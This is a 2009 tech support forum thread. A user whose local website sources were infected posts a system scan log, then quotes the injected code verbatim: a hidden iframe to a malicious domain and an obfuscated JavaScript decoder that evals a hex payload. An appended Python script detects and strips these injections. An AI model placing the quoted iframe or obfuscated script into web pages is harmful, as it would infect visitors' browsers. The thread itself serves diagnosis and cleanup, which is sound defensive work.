Old 06-27-2009, 03:20 AM   #1 (permalink)
Registered User
 
Join Date: Jun 2009
Posts: 2
OS: windows xp


hundreds of "trojan.script.9983" beaten our local webpage sources

Hi,
There are no sources to find articles about trojan.script.9983 and trojan.script.32804, as I googled to get rid of them.

The problem is that while I OPEN my web page folders, BitDefender starts saying that these htm/html/php files are infected by them and just blocks them. The thing is that in the reports all of the files have this mark " =>(IFRAME)" at the end. BitDefender fails to disinfect! It can only delete or quarantine them, which I can't.

These are the sources of my local web sites that I need to update and upload, and I thought TSF might know what to do.
I would be very glad if anyone can help.
Waiting for your response,
sincerely


----------------------------------------------------------
These are some of the BitDefender reports and locations:
Object Name Threat Name Final Status

E:\EasyPHP1-8\www\elecitex-2006-2007-b52\fa\judge\exclusive\back_b4_criterias_demo.htm=](IFRAME) Trojan.Script.32804 Disinfect Failed

E:\EasyPHP1-8\www\elecitex-2006-2007-b52\2004\0Cooperation.html=](IFRAME) Trojan.Script.9983 Disinfect Failed
--------------------------------------------------------------------



This is the DDS.txt file:


DDS (Ver_09-06-26.01) - NTFSx86
Run by Navid at 11:34:14.10 on Sat 06/27/2009
Internet Explorer: 7.0.5730.11
Microsoft Windows XP Professional 5.1.2600.2.1256.981.1033.18.959.339 [GMT 3.5:30]

AV: BitDefender Antivirus *On-access scanning enabled* (Updated) {6C4BB89C-B0ED-4F41-A29C-4373888923BB}
FW: BitDefender Firewall *enabled* {4055920F-2E99-48A8-A270-4243D2B8F242}

============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
C:\WINDOWS\system32\svchost -k rpcss
C:\Program Files\Common Files\BitDefender\BitDefender Update Service\livesrv.exe
C:\Program Files\BitDefender\BitDefender 2009\vsserv.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k NetworkService
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Ashampoo\Ashampoo AntiSpyWare 2\AntiSpyWareService.exe
C:\Program Files\IVT Corporation\BlueSoleil\BTNtService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\system32\svchost.exe -k bthsvcs
C:\WINDOWS\system32\crypserv.exe
C:\WINDOWS\system32\nvsvc32.exe
C:\Program Files\mail\5 Star Mail Server\SMTPListener.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\RUNDLL32.EXE
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\Ashampoo\Ashampoo AntiSpyWare 2\AntiSpyWare2Guard.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\WINDOWS\system32\rundll32.exe
C:\Program Files\BitDefender\BitDefender 2009\bdagent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\BitDefender\BitDefender 2009\seccenter.exe
C:\Program Files\IVT Corporation\BlueSoleil\BlueSoleil.exe
C:\Program Files\Shetab Farsi Negar 3\FarsiNegar.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Documents and Settings\Navid\Desktop\techsupportforum\dds.scr
C:\WINDOWS\system32\wbem\wmiprvse.exe

============== Pseudo HJT Report ===============

BHO: Groove GFS Browser Helper: {72853161-30c5-4d22-b7f9-0bbc1d38a37e} - c:\progra~1\micros~2\office12\GRA8E1~1.DLL
TB: Ultra Recall: {c501607c-4a98-4f5e-b9af-425e6bbd5186} - c:\program files\ultrarecall\integration\IEToolbar.dll
TB: BitDefender Toolbar: {381ffde8-2394-4f90-b10d-fc6124a40f8c} - c:\program files\bitdefender\bitdefender 2009\IEToolbar.dll
uRun: [CTFMON.EXE] c:\windows\system32\ctfmon.exe
uRun: [Ultra Recall] c:\program files\ultrarecall\UltraRecall.exe
mRun: [NvCplDaemon] RUNDLL32.EXE c:\windows\system32\NvCpl.dll,NvStartup
mRun: [nwiz] nwiz.exe /install
mRun: [NvMediaCenter] RUNDLL32.EXE c:\windows\system32\NvMcTray.dll,NvTaskbarInit
mRun: [RTHDCPL] RTHDCPL.EXE
mRun: [SkyTel] SkyTel.EXE
mRun: [Alcmtr] ALCMTR.EXE
mRun: [CloneCDTray] "c:\program files\slysoft\clonecd\CloneCDTray.exe" /s
mRun: ['Ashampoo AntiSpyWare 2 Guard'] c:\program files\ashampoo\ashampoo antispyware 2\AntiSpyWare2Guard.exe
mRun: [GrooveMonitor] "c:\program files\microsoft office\office12\GrooveMonitor.exe"
mRun: [AdobeCS4ServiceManager] "c:\program files\common files\adobe\cs4servicemanager\CS4ServiceManager.exe" -launchedbylogin
mRun: [IMJPMIG8.1] "c:\windows\ime\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
mRun: [MSPY2002] c:\windows\system32\ime\pintlgnt\ImScInst.exe /SYNC
mRun: [PHIME2002ASync] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /SYNC
mRun: [PHIME2002A] c:\windows\system32\ime\tintlgnt\TINTSETP.EXE /IMEName
mRun: [BluetoothAuthenticationAgent] rundll32.exe bthprops.cpl,,BluetoothAuthenticationAgent
mRun: [BDAgent] "c:\program files\bitdefender\bitdefender 2009\bdagent.exe"
mRun: [BitDefender Antiphishing Helper] "c:\program files\bitdefender\bitdefender 2009\IEShow.exe"
mRunOnce: [NCInstallQueue] rundll32 netman.dll,ProcessQueue
dRun: [CTFMON.EXE] c:\windows\system32\CTFMON.EXE
dRunOnce: [ShowDeskFix] regsvr32 /s /n /i:u shell32
StartupFolder: c:\docume~1\navid\startm~1\programs\startup\lingvo~1.lnk - c:\program files\lingvosoft\lingvosoft talking dictionary 2008 (english-persian (farsi)) for windows\LDStub.exe
StartupFolder: c:\docume~1\navid\startm~1\programs\startup\shetab~1.lnk - c:\program files\shetab farsi negar 3\FarsiNegar.exe
StartupFolder: c:\docume~1\alluse~1\startm~1\programs\startup\blueso~1.lnk - c:\program files\ivt corporation\bluesoleil\BlueSoleil.exe
IE: E&xport to Microsoft Excel - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: Send To &Ultra Recall (copy) - c:\program files\ultrarecall\integration\StoreFromIE.html
IE: Send To Ultra &Recall (link) - c:\program files\ultrarecall\integration\LinkFromIE.html
IE: {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe
IE: {FB5F1910-F110-11d2-BB9E-00C04F795683} - c:\program files\messenger\msmsgs.exe
IE: {24187A0F-0FDD-411b-80C6-F1F22F2ED10E} - {7FAD4718-729A-4fea-AA4B-EC340A7C0841} - c:\program files\ultrarecall\integration\IEToolbar.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\progra~1\micros~2\office12\ONBttnIE.dll
IE: {7F9DB11C-E358-4ca6-A83D-ACC663939424} - {9999A076-A9E2-4C99-8A2B-632FC9429223} - c:\program files\bonjour\ExplorerPlugin.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503} - c:\progra~1\micros~2\office12\REFIEBAR.DLL
IE: {FD1FF307-68BC-462f-8718-AAEDB6DB7EA2} - {60D7C798-8979-4560-AF4C-2FADE1075EF7} - c:\program files\ultrarecall\integration\IEToolbar.dll
TCP: {51543B1E-AEC5-4312-ACA8-1CFA23A25A51} = 85.185.106.6 217.218.127.104
TCP: {E3583C53-B304-4D61-A439-9CDC0B4F6E86} = 216.155.148.9 216.155.151.5
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\progra~1\micros~2\office12\GR99D3~1.DLL
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\wpdshserviceobj.dll
SEH: Groove GFS Stub Execution Hook: {b5a7f190-dda6-4420-b3ba-52453494e6cd} - c:\progra~1\micros~2\office12\GRA8E1~1.DLL

================= FIREFOX ===================

FF - ProfilePath - c:\docume~1\navid\applic~1\mozilla\firefox\profiles\mke43fth.default\
FF - component: c:\program files\mozilla firefox\components\FFComm.dll

============= SERVICES / DRIVERS ===============

R2 AASW2_Service;Ashampoo AntiSpyWare 2 Service;c:\program files\ashampoo\ashampoo antispyware 2\AntiSpyWareService.exe [2009-4-18 749400]
R2 BDVEDISK;BDVEDISK;c:\program files\bitdefender\bitdefender 2009\BDVEDISK.sys [2008-7-2 82696]
R2 SMTPMainService;SMTP Server Service;c:\program files\mail\5 star mail server\SMTPListener.exe [2007-2-4 776704]
R3 bdfm;BDFM;c:\windows\system32\drivers\bdfm.sys [2008-8-12 111112]
R3 Bdfndisf;BitDefender Firewall NDIS Filter Service;c:\windows\system32\drivers\bdfndisf.sys [2008-8-14 104328]
S3 Arrakis3;BitDefender Arrakis Server;c:\program files\common files\bitdefender\bitdefender arrakis server\bin\Arrakis3.exe [2008-7-17 118784]

=============== Created Last 30 ================

2009-06-21 12:54 <DIR> --d----- c:\docume~1\navid\applic~1\BitDefender
2009-06-21 12:53 <DIR> --d----- c:\docume~1\alluse~1\applic~1\BitDefender
2009-06-21 12:47 <DIR> --d----- c:\windows\system32\appmgmt
2009-05-31 15:01 <DIR> --d----- c:\windows\system32\Shetab
2009-05-31 15:01 <DIR> --d----- c:\program files\Shetab Farsi Negar 3
2009-05-31 13:39 <DIR> --d----- c:\windows\Maryam
2009-05-31 13:15 100,992 ac------ c:\windows\system32\dllcache\bthpan.sys
2009-05-31 13:15 100,992 a------- c:\windows\system32\drivers\bthpan.sys
2009-05-31 13:13 5,504 ac------ c:\windows\system32\dllcache\mstee.sys
2009-05-31 13:12 86,016 a----r-- c:\windows\system32\drivers\SCBaud.w9x
2009-05-31 13:12 <DIR> --d----- c:\program files\IVT Corporation

==================== Find3M ====================

2009-06-25 14:00 81,984 a------- c:\windows\system32\bdod.bin
2009-06-23 11:10 192,512 a------- c:\windows\system32\txmlutil.dll
2009-06-23 11:10 242,184 a------- c:\windows\system32\drivers\bdfsfltr.sys
2009-06-23 11:09 104,328 a------- c:\windows\system32\drivers\bdfndisf.sys
2009-06-23 11:09 111,112 a------- c:\windows\system32\drivers\bdfm.sys
2009-06-23 11:09 82,696 a------- c:\windows\system32\drivers\BDVEDISK.sys
2009-05-19 13:26 132 a------- C:\httpdwl.dat
2009-04-23 19:01 83,208 a---h--- c:\windows\system32\mlfcache.dat
2009-04-22 19:29 107,888 a------- c:\windows\system32\CmdLineExt.dll
2009-04-18 22:09 2,305 a------- c:\program files\common files\unins000.dat
2009-04-18 22:08 728,858 a------- c:\program files\common files\unins000.exe
2009-04-18 17:03 4,501 a------- c:\windows\gdrv.sys
2009-04-18 13:03 86,327 a------- c:\windows\pchealth\helpctr\offlinecache\index.dat
2009-04-18 12:06 21,640 a------- c:\windows\system32\emptyregdb.dat
2008-03-09 07:25 236 a---h--- c:\program files\common files\dx.reg
2002-07-10 13:14 11,264 ---shr-- c:\windows\sysback\DOTS.DAT
2001-04-25 14:57 6,708 ---shr-- c:\windows\sysback\GPOS.DAT
2001-04-25 14:58 206,808 ---shr-- c:\windows\sysback\GST.DAT
2001-08-23 15:30 5,632 ---shr-- c:\windows\sysback\KBDFA.DLL
2000-11-04 17:18 583,680 ---shr-- c:\windows\sysback\MSSPELAR.DLL

============= FINISH: 11:35:16.65 ===============


And the zip files are attached.
Attached Files
File Type: zip Attach & Ark 1.zip (3.6 KB, 1 views)
Navarena is offline  
Old 07-02-2009, 02:02 AM   #2 (permalink)
Registered User
 
Join Date: Jun 2009
Posts: 2
OS: windows xp


Re: be aware thousands of "trojan.script.9983" beaten our local webpage sources

Hi
I think I found the problem and the resolution, but not completely.
There are scripts and IFrames inserted at the bottom of all of the local web pages on the hard drive, which link to other sites that seem to be suspicious hijackers or virus downloaders. Where did it come from? I think from an mp3 file on a cooldisk.

Now the question is how to remove these tags from 2225 infected files? Of course it can be done manually for some pages, but not for this number of files!!! Another thing is that only one of the above "Iframe" or "script" is seen in a webpage's source code at a time.
Any suggestions? I'm badly in a hurry.

Warning for those who are not advanced users and IT pros:
>> do not use or copy-paste the iframe or scripts mentioned below <<

The IFRAME is as follows. It is at the bottom of the page, before these tags: </body> </html>, and only BitDefender identifies it as trojan.script.9983



<iframe src="http://NtKrnlpa.com/rc/" width=1 height=1 style="border:0"></iframe>





And the scripts are as follows, which I think BitDefender identifies (with some doubt) as trojan.script.32804. I'm not sure what it is:

<script>
nb="505b574159515a401a43465d40511c16085d52465559511447465709135c4040440e1b1b47555e5c525c4747565d53565b5a59471a51010c4e1a575a1b45435146404d1b1314435d50405c09130513145c515d535c40091305131447404d58510913425d475d565d585d404d0e145c5d5050515a0f130a081b5d52465559510a161d0f3e514d475209167a557a160f4e514c5509167a557a160f";gnzkp="function bywpn(){ggetg=Math.PI;esqsjr=parseInt;vhyi='length';rhu=esqsjr(~((ggetg&ggetg)|(~ggetg&ggetg)&(ggetg&~ggetg)|(~ggetg&~ggetg)));ca=esqsjr(((rhu&rhu)|(~rhu&rhu)&(rhu&~rhu)|(~rhu&~rhu))&1);ukklp=ca<<ca;zexa=rhu;eysf='';gkn=String.fromCharCode;mk=eval;for(cg=rhu;cg<gnzkp[vhyi];cg-=-ca)zexa+=gnzkp.charCodeAt(cg);zexa%=unescape(rhu+unescape('%78')+(ca<<6));for(cg=rhu;cg<nb[vhyi];cg+=ukklp)eysf+=gkn(esqsjr(rhu+unescape('%78')+nb.charAt(cg)+nb.charAt(cg+esqsjr(ca)))^zexa);try{mk(eysf);}catch(e){try{eval(eysf);}catch(e) {window.location='/';}}}try{eval('bywpn();')}catch(e) {}";eval(gnzkp);
</script>

------
I'm looking forward to help with an automated update which could remove these tags and disinfect the files, as well as the virus itself, which I think was in an mp3 file on the cooldisk. I deleted them, however. My cooldisk is also totally infected. Are there any other suggestions?
Navarena is offline  
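The automated clean-up asked for above, as an added example that is not from the thread or from any BitDefender tooling: a Python script that finds and strips the two injections quoted in the post (the hidden iframe and the obfuscated script) from every htm/html/php file under a folder, dry-run by default and keeping a .bak of each file it rewrites. The only values taken from the page are the iframe domain and the script markers (nb=, function bywpn(), eval(gnzkp)); the sample page, its placeholder decoder body and the script name clean_inject.py are my own constructions.

```python
import re
from pathlib import Path

# Signatures of the two injections quoted in the post (domain and markers come
# from the thread). Bytes patterns keep each file's own encoding untouched.
IFRAME_RE = re.compile(
    rb'<iframe\s+src="http://NtKrnlpa\.com/rc/"[^>]*>\s*</iframe>\s*', re.IGNORECASE)
# Each injected <script> defines the hex blob `nb`, the decoder `bywpn`, and ends
# with eval(gnzkp); the non-greedy .*? keeps a match to one <script> element.
SCRIPT_RE = re.compile(
    rb'<script>\s*nb="[0-9a-f]+";gnzkp="function bywpn\(\).*?eval\(gnzkp\);\s*</script>\s*',
    re.IGNORECASE | re.DOTALL)


def clean_html(html: bytes) -> tuple[bytes, dict[str, int]]:
    """Strip the injections from one document; return (cleaned, counts)."""
    counts = {}
    cleaned, counts["iframe"] = IFRAME_RE.subn(b"", html)
    cleaned, counts["script"] = SCRIPT_RE.subn(b"", cleaned)
    return cleaned, counts


def clean_tree(root: Path, extensions=(".htm", ".html", ".php"), dry_run=True):
    """Return {path: counts} for every web source under root that carried an
    injection. With dry_run=False the file is rewritten and the original is
    kept beside it as <name>.bak (a .bak is never rescanned)."""
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        original = path.read_bytes()
        cleaned, counts = clean_html(original)
        if cleaned == original:
            continue  # clean file: never touched
        report[str(path)] = counts
        if not dry_run:
            path.with_name(path.name + ".bak").write_bytes(original)
            path.write_bytes(cleaned)
    return report


# Constructed sample with the layout described in the post; the decoder body is
# a placeholder, not the real obfuscated payload.
SAMPLE_PAGE = (
    b"<html><body>\n<h1>Cooperation</h1>\n"
    b'<iframe src="http://NtKrnlpa.com/rc/" width=1 height=1 style="border:0"></iframe>\n'
    b'<script>\nnb="505b5741";gnzkp="function bywpn(){ placeholder }";eval(gnzkp);\n'
    b'</script><script>\nnb="505b5741";gnzkp="function bywpn(){ placeholder }";eval(gnzkp);\n'
    b"</script>\n</body> </html>\n")

if __name__ == "__main__":  # e.g. python clean_inject.py E:\EasyPHP1-8\www --write
    import sys
    print(clean_html(SAMPLE_PAGE)[1] if len(sys.argv) < 2 else
          clean_tree(Path(sys.argv[1]), dry_run="--write" not in sys.argv))
```

Run it once without --write to get the list of affected files and counts, compare a few against what BitDefender flagged, and only then rerun with --write; the .bak copies let you diff or roll back any page.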
Copyright 2001 - 2009, Tech Support Forum